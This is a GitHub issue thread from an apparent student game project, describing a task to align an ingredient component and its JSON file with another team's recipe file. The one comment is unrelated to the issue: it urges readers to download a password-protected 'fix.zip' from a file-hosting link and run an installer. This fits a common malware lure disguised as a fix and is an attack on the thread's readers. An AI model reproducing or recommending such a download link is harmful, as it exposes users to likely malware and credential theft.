### ISSUE TITLE
Task: Align IngredientComponent and Ingredients.json with Recipe.json

### ISSUE THREAD

**Issue by madeleinecoombs** [UQcsse3200/2024-studio-3#67]
# **Description**
**Task:** [Align IngredientComponent and Ingredients.json with Recipe.json].
**Feature:** [Creating Items](#5)

This task will align the contents and logic of our team's IngredientComponent class and Ingredients.json with the contents of Team 2's Recipes.json, which, upon their mid-sprint merge, revealed a misalignment in expectations. Thus, this task will rework IngredientComponent class and Ingredients.json to ensure consistency. 

# **Dependencies**
- [x] Create JSON File (#35)
 
# **Milestones**
List of steps that need to be completed for this task.
- [x] Identify Ingredients used in #35 (Aug. 26)
- [x] Ensure ingredients.json includes all identified Ingredients (Aug. 26)
- [x] Work with Team 2 to Clarify the Logic Behind recipe.json and their Expectations of Ingredients/Meals (Aug. 27)
- [x] Align IngredientComponent's logic with Team 2's Expectations (Aug. 27)
- [x] Testing (Aug. 28)
- [x] Write Documentation (Aug. 28)
 
**Completion Deadline:** Aug. 28
 
# **Documentation**
- [x] https://github.com/UQcsse3200/2024-studio-3/wiki/Items#ingredientcomponent
- [x] https://github.com/UQcsse3200/2024-studio-3/wiki/Food-Items#ingredients

# **Member**
- Madeleine (madeleinecoombs)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
